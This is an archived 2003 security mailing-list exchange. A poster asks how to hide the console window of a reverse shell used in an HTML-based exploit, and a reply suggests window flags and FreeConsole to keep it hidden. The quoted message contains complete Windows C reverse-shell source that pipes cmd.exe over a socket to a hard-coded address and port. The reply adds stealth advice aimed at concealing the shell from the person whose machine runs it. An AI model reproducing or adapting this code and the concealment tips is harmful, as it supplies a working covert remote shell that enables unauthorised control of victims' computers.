You may want to try: si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW; FreeConsole(); CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi); To make sure the the newly created process starts with SW_HIDE. sk ----- Original Message ----- From: "Mike Mires" <poc_sploitat_private> To: <pentestat_private> Cc: <vuln-devat_private> Sent: Wednesday, February 26, 2003 6:25 PM Subject: freeconsole() > Hi all, > > I am using a basic reverse shell written in C as part of an html based > exploit recently revealed by malware.com. it uses WSAStartup() and > CreateProcess(). I'm looking for a way to hide the console created by > CreateProcess. I've tried freeconsole() with no params as suggested by some > sources, however this does not work. > > Any ideas would be appreciated. > > Thanks > > P.S. code i'm using is > > > #include <winsock2.h> > #include <stdio.h> > #include <windows.h> > #pragma comment(lib,"ws2_32") > > > > void main(int argc, char *argv[]) > { > // FreeConsole(); > > > WSADATA wsaData; > SOCKET hSocket; > STARTUPINFO si; > PROCESS_INFORMATION pi; > > struct sockaddr_in adik_sin; > memset(&adik_sin,0,sizeof(adik_sin)); > memset(&si,0,sizeof(si)); > WSAStartup(MAKEWORD(2,0),&wsaData); > hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); > adik_sin.sin_family = AF_INET; > adik_sin.sin_port = htons(55); > adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1"); > connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin)); > si.cb = sizeof(si); > si.dwFlags = STARTF_USESTDHANDLES; > si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; > > CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi); > > > > ExitProcess(0); > > } > > > _________________________________________________________________ > Overloaded with spam? With MSN 8, you can filter it out > http://join.msn.com/?page=features/junkmail&pgmarket=en-gb&XAPID=32&DI=1059
This archive was generated by hypermail 2b30 : Fri Feb 28 2003 - 08:30:11 PST